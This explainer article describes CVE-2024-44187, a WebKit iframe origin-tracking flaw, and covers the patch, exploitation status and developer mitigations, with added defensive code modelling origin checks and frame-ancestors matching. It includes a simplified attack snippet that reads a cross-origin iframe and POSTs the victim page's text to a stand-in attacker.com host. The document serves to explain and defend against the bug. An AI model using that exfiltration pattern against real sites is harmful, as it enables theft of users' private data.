CVE-2024-44187 - Cross-Origin iframe Vulnerability in WebKit — How Data Leaked and How It Got Fixed
Web security is all about making sure information stays where it is supposed to be. One of the most damaging failures is a malicious website reading sensitive data that belongs to another website. In 2024 a bug of this kind was reported in WebKit (the browser engine behind Safari) and tracked as CVE-2024-44187. In Apple's words, processing maliciously crafted web content could lead to cross-origin data exfiltration: in plain terms, a bad website could read content belonging to other origins, because of the way the security origins of browser iframes were tracked.
This long read will break down what CVE-2024-44187 is, how attackers exploited this bug, what the fix looks like, and what you can do to stay safe.
What Was the Problem? (The Cross-Origin Issue with iframes)
Browsers use something called the Same-Origin Policy to make sure scripts from one site can’t access content from another. For example, JavaScript running on evil.com should not be able to look into your logged-in session at bank.com.
In 2024, Apple addressed a cross-origin bug in the handling of <iframe> elements in WebKit, the engine that runs Safari and every web view on iOS, iPadOS, macOS and other Apple platforms.
iframes let you load one webpage inside another; they are often used for embedded widgets or advertisements. The bug involved how WebKit tracked the "security origin" of iframes, and a malicious site could use it to read data belonging to other origins.
Affected: visionOS up to version 1, and Safari and OS releases before the fixed versions below.
> Fixed in: Safari 18, visionOS 2, watchOS 11, macOS Sequoia 15, iOS 18, iPadOS 18, tvOS 18
How the attack works:
1. The victim visits evil.com.
2. evil.com loads an iframe with a page from a target (like your bank); the framed page loads with whatever cookies the browser sends it.
3. Because of the bug, evil.com can interact with what's inside the iframe, even though it's not supposed to.
Here's what a simplified attack might look like:
<!-- evil.com -->
<iframe id="steal" src="https://private-victim.com/secret-data"></iframe>
<script>
document.getElementById('steal').onload = function () {
  var frame = document.getElementById('steal');
  try {
    // Cross-origin DOM access: the Same-Origin Policy must make this throw.
    var stolen = frame.contentWindow.document.body.innerText;
    // If the read succeeded, ship the victim page's text to the attacker.
    fetch('https://attacker.com/stolen', {
      method: 'POST',
      body: stolen
    });
  } catch (err) {
    // A correctly behaving browser lands here with a SecurityError.
    console.error('Blocked by browser - but the bug might bypass this!', err);
  }
};
</script>
In a correctly behaving browser the contentWindow.document access throws a SecurityError and the catch branch runs. On vulnerable Safari/WebKit the read could succeed, exposing whatever the framed page rendered for the victim: emails, account numbers, or CSRF tokens.
The Patch: How Did Apple Fix It?
Apple describes the fix as improved tracking of "security origins" for iframes. A security origin is the combination of scheme (http/https), host and port that the browser uses to decide which documents may touch each other's content.
Before the patch, WebKit could get that bookkeeping wrong for iframes and let a page reach across the boundary. Apple's advisory gives no further detail on which code path was affected.
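To make the idea of a tracked security origin concrete, here is an added example (not WebKit source and not Apple's fix) in JavaScript, runnable in Node: a small model of how a browser derives an iframe document's origin and performs the same-origin check that should deny the DOM read in the attack above. The hosts evil.com and private-victim.com are the article's illustrative names; the frame-record functions and the opaque-origin counter are this example's own simplification, not a WebKit API.

```javascript
// Added example, not WebKit source: a model of the "security origin" a browser
// assigns to each document and of how an <iframe>'s origin is derived.
// Simplified from the HTML specification:
//   - http(s) URLs get a tuple origin (scheme, host, port), default ports filled in
//   - about:blank, about:srcdoc and javascript: frames inherit the initiator's origin
//   - anything else (e.g. data:) gets an opaque origin, same-origin only with itself
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };
let nextOpaqueId = 1;

function tupleOrigin(urlString) {
  const u = new URL(urlString);
  if (!(u.protocol in DEFAULT_PORTS)) {
    return { opaque: true, id: nextOpaqueId++ };
  }
  return {
    scheme: u.protocol.slice(0, -1),      // "https:" -> "https"
    host: u.hostname,                     // already lower-cased by the URL parser
    port: u.port || DEFAULT_PORTS[u.protocol],
  };
}

// Origin of the document a frame shows after loading `src`, when the load was
// started by a document whose origin is `initiatorOrigin`.
function frameOrigin(src, initiatorOrigin) {
  const s = src.trim().toLowerCase();
  if (s === 'about:blank' || s === 'about:srcdoc' || s.startsWith('javascript:')) {
    return initiatorOrigin;               // inherited: the parent may script this document
  }
  return tupleOrigin(src);
}

function sameOrigin(a, b) {
  if (a.opaque || b.opaque) return a === b;   // an opaque origin matches only itself
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// The origin belongs to the document currently inside the frame, not to the
// <iframe> element, so every navigation has to recompute it. Modeled as a record.
function createFrame(src, creatorOrigin) {
  return { origin: frameOrigin(src, creatorOrigin) };
}
function navigateFrame(frame, newSrc, initiatorOrigin) {
  frame.origin = frameOrigin(newSrc, initiatorOrigin);
  return frame;
}

// The check a browser must pass before handing `frame.contentWindow.document`
// to a script: accessing document and framed document must be same-origin.
function canReadFrameDom(accessorOrigin, frame) {
  return sameOrigin(accessorOrigin, frame.origin);
}

// Stand-alone demonstration with the article's illustrative hosts.
const evil = tupleOrigin('https://evil.com/');
const victimFrame = createFrame('https://private-victim.com/secret-data', evil);
console.log('evil.com reads victim frame:', canReadFrameDom(evil, victimFrame));     // false
const blank = createFrame('about:blank', evil);
console.log('evil.com reads its about:blank frame:', canReadFrameDom(evil, blank));   // true
navigateFrame(blank, 'https://private-victim.com/secret-data', evil);
console.log('...after navigating it cross-origin:', canReadFrameDom(evil, blank));    // false
```

The point the model makes is that an about:blank frame legitimately inherits its creator's origin and is scriptable by the parent, but the moment the frame is navigated somewhere cross-origin the recorded origin must change, or the check passes wrongly. That bookkeeping is what "tracking of security origins" refers to; Apple's advisory does not say which part of it WebKit got wrong.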
Impact: any authenticated session or private information displayed on a page that could be loaded in an iframe was open to theft. If you were browsing on an outdated iPhone or Mac, you were at risk just by visiting a booby-trapped website. One mitigating factor: Safari blocks third-party cookies by default, so a cross-site iframe often does not render the victim's logged-in view; content that does not depend on cookies, or sites the user has granted cookie access, was still exposed.
Did This Get Exploited in the Wild?
As of Apple's advisory in September 2024, there was no public confirmation of active exploitation, and the advisory carried no note of known exploitation. That is not proof the bug was never used: a flaw that needs nothing more than a visit to a booby-trapped page is attractive for targeted attacks, and such use would not necessarily be reported.
What Should You Do?
- Malicious websites could steal data between sites, so don't ignore browser and OS security updates.
- Update: Safari 18, macOS Sequoia 15, iOS 18, iPadOS 18, tvOS 18, visionOS 2, watchOS 11 or later have fixed the problem.
- If you're a developer, the protection that matters for this class of bug is refusing to be framed: send Content-Security-Policy: frame-ancestors 'none' (or a list of trusted embedders) and X-Frame-Options: DENY on pages that display session-bound data, so an attacker's page never gets your content into an iframe. The iframe sandbox attribute protects you from content you embed; it does not protect your page from a buggy or malicious parent.
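For the developer advice above, here is an added example (not from the article) in JavaScript, runnable in Node, of what frame-ancestors actually decides: given a page's Content-Security-Policy header and the URL of a would-be embedder, may the page be framed? The policy string, bank.com and the partner hostnames are constructed for the example, and the matcher is a simplified version of the CSP source-expression rules (it handles 'self', 'none', exact hosts, *. wildcards, schemes and ports; it omits paths and the http-to-https upgrade rule).

```javascript
// Added example, not from the article: the decision a browser makes when a page
// that sends Content-Security-Policy: frame-ancestors ... is about to be framed.
// Simplified CSP source matching: 'none', 'self', scheme://host[:port] and
// scheme://*.host[:port]; paths and the http->https upgrade rule are omitted.
const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Pull the frame-ancestors source list out of a CSP header value, or null if absent.
function frameAncestors(cspHeader) {
  for (const directive of cspHeader.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

function effectivePort(u) {
  return u.port || DEFAULT_PORT[u.protocol] || '';
}

// Does one source expression match the embedder, given the page being framed?
function sourceMatches(source, pageUrl, embedderUrl) {
  const s = source.toLowerCase();
  const page = new URL(pageUrl);
  const emb = new URL(embedderUrl);
  if (s === "'self'") {
    return emb.protocol === page.protocol && emb.hostname === page.hostname &&
      effectivePort(emb) === effectivePort(page);
  }
  // scheme://  *.  host  :port   (scheme and port optional)
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+))?$/.exec(s);
  if (!m) return false;                       // 'none' and malformed sources match nothing
  const [, scheme, wildcard, host, port] = m;
  const wantScheme = scheme ? scheme + ':' : page.protocol;   // no scheme: the page's own
  if (emb.protocol !== wantScheme) return false;
  const hostOk = wildcard
    ? emb.hostname.endsWith('.' + host)       // any subdomain, but not the bare host
    : emb.hostname === host;
  if (!hostOk) return false;
  const wantPort = port || DEFAULT_PORT[wantScheme] || '';
  return effectivePort(emb) === wantPort;
}

// true if `embedderUrl` may put `pageUrl` in an <iframe>, according to `cspHeader`.
function mayBeFramedBy(cspHeader, pageUrl, embedderUrl) {
  const sources = frameAncestors(cspHeader);
  if (sources === null) return true;          // no directive: CSP imposes no restriction
  return sources.some((src) => sourceMatches(src, pageUrl, embedderUrl));
}

// Stand-alone demonstration with a constructed policy and hosts.
const POLICY = "default-src 'self'; frame-ancestors 'self' https://*.trusted.example https://partner.example:8443";
const PAGE = 'https://bank.com/account';
for (const embedder of ['https://evil.com/', 'https://bank.com/', 'https://widgets.trusted.example/',
                        'https://trusted.example/', 'https://partner.example/', 'https://partner.example:8443/']) {
  console.log(embedder, '->', mayBeFramedBy(POLICY, PAGE, embedder));
}
```

With frame-ancestors 'none' (or X-Frame-Options: DENY for older browsers) on pages that show session-bound data, a page like evil.com in the attack above never gets the victim page into an iframe at all, so a parent-reads-child bug has nothing to read.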
Further Reading
- Apple Security Releases
- WebKit Security Updates
If you’re worried about your device, check your software updates today and review your security habits!
Timeline
Published on: 09/17/2024 00:15:52 UTC
Last modified on: 09/25/2024 13:25:52 UTC